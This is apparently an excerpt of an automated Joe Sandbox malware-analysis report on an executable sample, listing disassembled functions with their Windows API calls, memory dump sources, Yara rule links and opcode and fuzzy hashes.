                                                                                                                                                                                                            • Part of subcall function 0048F5E0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0048F665
                                                                                                                                                                                                            • Part of subcall function 0048F5E0: DeviceIoControl.KERNEL32(00000000,00074080,00000000,00000000,?,00000018,?,00000000), ref: 0048F6AE
                                                                                                                                                                                                            • Part of subcall function 0048F5E0: DeviceIoControl.KERNEL32(00000000,0007C088,00000000,00000021,00000000,00000221,?,00000000), ref: 0048F6F9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ControlDevice$CreateFile$Version
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 393535756-0
                                                                                                                                                                                                          • Opcode ID: aa1b7f3f8d8e864e31ca7c91456754dc403ceb99789d541ac3d68d4f6994d251
                                                                                                                                                                                                          • Instruction ID: 3c107b6878ab20a9f70ddca5955e85d060b8005f8bb4886d576cb75bd39d5404
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa1b7f3f8d8e864e31ca7c91456754dc403ceb99789d541ac3d68d4f6994d251
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F110871F0010897DF14AE15BC426EFF799AB99304F5004BBE90A93243EE359E5D87A5
                                                                                                                                                                                                          Function 00474650 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00475100: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00475132
                                                                                                                                                                                                            • Part of subcall function 00475100: allocator.LIBCONCRTD ref: 0047513F
                                                                                                                                                                                                            • Part of subcall function 00475100: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 0047514A
                                                                                                                                                                                                            • Part of subcall function 00475100: construct.LIBCPMTD ref: 0047516E
                                                                                                                                                                                                            • Part of subcall function 00475100: construct.LIBCPMTD ref: 0047518E
                                                                                                                                                                                                            • Part of subcall function 00475100: construct.LIBCPMTD ref: 004751AE
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004746BF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Base::Concurrency::details::ContextIdentityQueueWorkconstruct$allocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2348496747-0
                                                                                                                                                                                                          • Opcode ID: ad00bc9e5e6a7a30b6593de30325a655e17fdf1f4205cd0013a42deedd7eea69
                                                                                                                                                                                                          • Instruction ID: cef0ee04b16104f76dedcec972761b581f2b215b8f3eb225cf5d0f24c2684c61
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad00bc9e5e6a7a30b6593de30325a655e17fdf1f4205cd0013a42deedd7eea69
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A11177B5D04148DFC700DF59D945BAFBBF8EB45724F10852AF409A7381D739AA048BA6
                                                                                                                                                                                                          Function 00519C18 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7b57dc140fb26d489f0c7e9b4b836a323a0bc9584ddb89b6dac71a1f73f069be
                                                                                                                                                                                                          • Instruction ID: 6e5a0b0a9206c404654d1a1c9ddaf3ecc1e4dd3f4e34e595202059790e1b8037
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b57dc140fb26d489f0c7e9b4b836a323a0bc9584ddb89b6dac71a1f73f069be
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0F432900A1516FB313A298C09ADA3FD8BFC2338F100715F4A1931C1DB74DE8296E1
                                                                                                                                                                                                          Function 00472B40 Relevance: 1.5, APIs: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00472B6B
                                                                                                                                                                                                            • Part of subcall function 00473190: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 004731CC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2086788075-0
                                                                                                                                                                                                          • Opcode ID: 2cdbee402b95a86fd5a257ed2ba41af80f984cd9f89bdf09cdeabb6a3630f0f6
                                                                                                                                                                                                          • Instruction ID: 27ab0d6948dbd3aedf058718eef0b44c8b8e0698d4b3bb5e349a3e7e9eedd6a1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdbee402b95a86fd5a257ed2ba41af80f984cd9f89bdf09cdeabb6a3630f0f6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 911115B0A04149CFCB08DF95C891AAFBBB5FF88704F10866EE419A73A0DB346D00CB95
                                                                                                                                                                                                          Function 00473190 Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2086788075-0
                                                                                                                                                                                                          • Opcode ID: 779fa4ab396a2ce75c8994fd98d2866afa9630acd4306063568da9dffb571c78
                                                                                                                                                                                                          • Instruction ID: 97ea65f5ad0ef7a040eae288a3ba562da4a804a96c34be4ebe53f7d40c0d9ce6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 779fa4ab396a2ce75c8994fd98d2866afa9630acd4306063568da9dffb571c78
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91014474E04108EBCB04DF94D8818EEB7B5AF88305B10C1AEF90957306D6349F51EB95
                                                                                                                                                                                                          Function 00533FE1 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00534B51: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00534B83
                                                                                                                                                                                                          • _free.LIBCMT ref: 00534001
                                                                                                                                                                                                            • Part of subcall function 005335AF: RtlFreeHeap.NTDLL(00000000,00000000,?,0053BA6B,?,00000000,?,00000000,?,0053BD0F,?,00000007,?,?,0053C0BE,?), ref: 005335C5
                                                                                                                                                                                                            • Part of subcall function 005335AF: GetLastError.KERNEL32(?,?,0053BA6B,?,00000000,?,00000000,?,0053BD0F,?,00000007,?,?,0053C0BE,?,?), ref: 005335D7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 314386986-0
                                                                                                                                                                                                          • Opcode ID: bcbf921a974124c1a804fa3d6967e16930b2a0212c92ebbdf7da04c9d64abdad
                                                                                                                                                                                                          • Instruction ID: 1118b06e0d16837dcd849723365bb1a11a6542baf66879665c8401d6cb01e242
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcbf921a974124c1a804fa3d6967e16930b2a0212c92ebbdf7da04c9d64abdad
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F062B11057048FD7349F50D885752BBE8FF44715F10882EE69A8BA92CB75F4448B94
                                                                                                                                                                                                          Function 00534B51 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00534B83
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          • Opcode ID: 101f1b506b6ac216ab63973f43994e34ff92fbd4033edf98cf224f6c8c02a3cf
                                                                                                                                                                                                          • Instruction ID: 8a92054c7a01f70fbb1b1d4cba13d748780dfb86929477dcde6f5393a3e5c90d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 101f1b506b6ac216ab63973f43994e34ff92fbd4033edf98cf224f6c8c02a3cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDE0E52110022196DE212A699C24BAFBF5CBF827B0F050121EC05D61D0CB30EC404AA4
                                                                                                                                                                                                          Function 00513AC7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00514EBE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2005118841-0
                                                                                                                                                                                                          • Opcode ID: 3655e9e70a6fdb6fc328b61fc3a9aded612cd26590e03d56311362d4d5cf2bd9
                                                                                                                                                                                                          • Instruction ID: efdf070e853203b805f60ea3b3b17bd2b3b1c4a214f469ae50335340e4fbd715
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3655e9e70a6fdb6fc328b61fc3a9aded612cd26590e03d56311362d4d5cf2bd9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7E0923450020FBAAF04F6B4EC1A4EE7F6C7E40360F244635B85A944E1EF70DAD6C591
                                                                                                                                                                                                          Function 004909A0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2353593579-0
                                                                                                                                                                                                          • Opcode ID: 866d95a0b0d76f61a06cbc8fd01d2a4a772116b61059f3aae98403638a59fbb4
                                                                                                                                                                                                          • Instruction ID: 7a95f740de69eba1d6098e9b2e90b5f96e620c0a5e3f90eca49aad889956d987
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 866d95a0b0d76f61a06cbc8fd01d2a4a772116b61059f3aae98403638a59fbb4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61E04FB2602128EF9F209F94E804EEB7B58EF14761704842AF80987211C735E850DB94
                                                                                                                                                                                                          Function 0C9053DB Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                          • API String ID: 0-4266656565
                                                                                                                                                                                                          • Opcode ID: 9caf477a5df280b1f853b09abd2b5cd03a95b97393d52faefe5797923229ceb5
                                                                                                                                                                                                          • Instruction ID: 44f967858591b9d0b87f7521678a152e4fe6bd332e55f77024153a1e29db8d9f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9caf477a5df280b1f853b09abd2b5cd03a95b97393d52faefe5797923229ceb5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5B12671E002189FDB20CF85C5807AEB7FAEF48310F26855AD958AB391D375AC41CF95
                                                                                                                                                                                                          Function 00473B10 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00473C80: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00473CB2
                                                                                                                                                                                                            • Part of subcall function 00473C80: allocator.LIBCONCRTD ref: 00473CBF
                                                                                                                                                                                                            • Part of subcall function 00473C80: construct.LIBCPMTD ref: 00473CE3
                                                                                                                                                                                                            • Part of subcall function 00473C80: construct.LIBCPMTD ref: 00473D03
                                                                                                                                                                                                            • Part of subcall function 00473C80: construct.LIBCPMTD ref: 00473D23
                                                                                                                                                                                                          • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00473B25
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: construct$Base::Concurrency::details::ContextIdentityQueueWork$allocator
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1129248848-0
                                                                                                                                                                                                          • Opcode ID: 414794af40cd2e84f53808964091c8b90f65fa88ea0d11ec097da96620b40797
                                                                                                                                                                                                          • Instruction ID: 25e5cb8ddf3b898c3aefcc260fe0e82ae78402d5cdd61d12b0a077c4a3834811
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 414794af40cd2e84f53808964091c8b90f65fa88ea0d11ec097da96620b40797
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2ED0A931901128AF8704EF99D8028EEB3ECEB05215B0001EEE808A3300DA712F00A7D5
                                                                                                                                                                                                          Function 00472D90 Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _DebugHeapAllocator.LIBCPMTD ref: 00472DA0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocatorDebugHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 571936431-0
                                                                                                                                                                                                          • Opcode ID: f5aaaa96274242fbbc52f909823332099c1dc1219f608bee4f65e3f420248663
                                                                                                                                                                                                          • Instruction ID: e0129dbc86464733245815c66f35600bb4f9256e7d64f116b6f0fe878cda7025
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5aaaa96274242fbbc52f909823332099c1dc1219f608bee4f65e3f420248663
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C01235D0410C6B8B00EED4D8418DDBB7C9B44201F0041EAD80863341D6316A598791
                                                                                                                                                                                                          Function 00474260 Relevance: 1.5, APIs: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • error_info_injector.LIBCPMTD ref: 00474268
                                                                                                                                                                                                            • Part of subcall function 004743B0: Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 004743BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AsyncTask$CollectionCollection::~_Concurrency::details::_error_info_injector
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3071161433-0
                                                                                                                                                                                                          • Opcode ID: d41d7edb70eb5f44063bc42364feadc2cbf5b0486bacc2602836522385678d0f
                                                                                                                                                                                                          • Instruction ID: bde561f789f1771c315e42a7d24049891e325617161e6eedde900708f8020cb0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d41d7edb70eb5f44063bc42364feadc2cbf5b0486bacc2602836522385678d0f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44B0122024020C63C6006542F812F65335C4780624E008015FE0C0E281CA6268008188
                                                                                                                                                                                                          Function 0C9056C9 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3294499264.000000000C900000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C900000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c900000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: w
                                                                                                                                                                                                          • API String ID: 0-4266656565
                                                                                                                                                                                                          • Opcode ID: 5e674b8ddc7c3af3e6b0b7fc9d1ae4ece824b37fd7729debff351359abb9dd95
                                                                                                                                                                                                          • Instruction ID: d62138bcd9bc89bc0e78f8ec0ac93424b9887144008c94e3e26b06891808de36
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e674b8ddc7c3af3e6b0b7fc9d1ae4ece824b37fd7729debff351359abb9dd95
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE715A71E002288FEB20CF45C5907AAF7F6EF49350F21855AEA59AB381D375AC51CF91
                                                                                                                                                                                                          Function 00490850 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00490862
                                                                                                                                                                                                            • Part of subcall function 004A1170: GetModuleHandleW.KERNEL32(00000000), ref: 004A119B
                                                                                                                                                                                                            • Part of subcall function 004A1170: LoadCursorW.USER32(00000000,00007F00), ref: 004A11B2
                                                                                                                                                                                                            • Part of subcall function 004A1170: RegisterClassExW.USER32(00000030), ref: 004A11DB
                                                                                                                                                                                                          Memory Dump Source
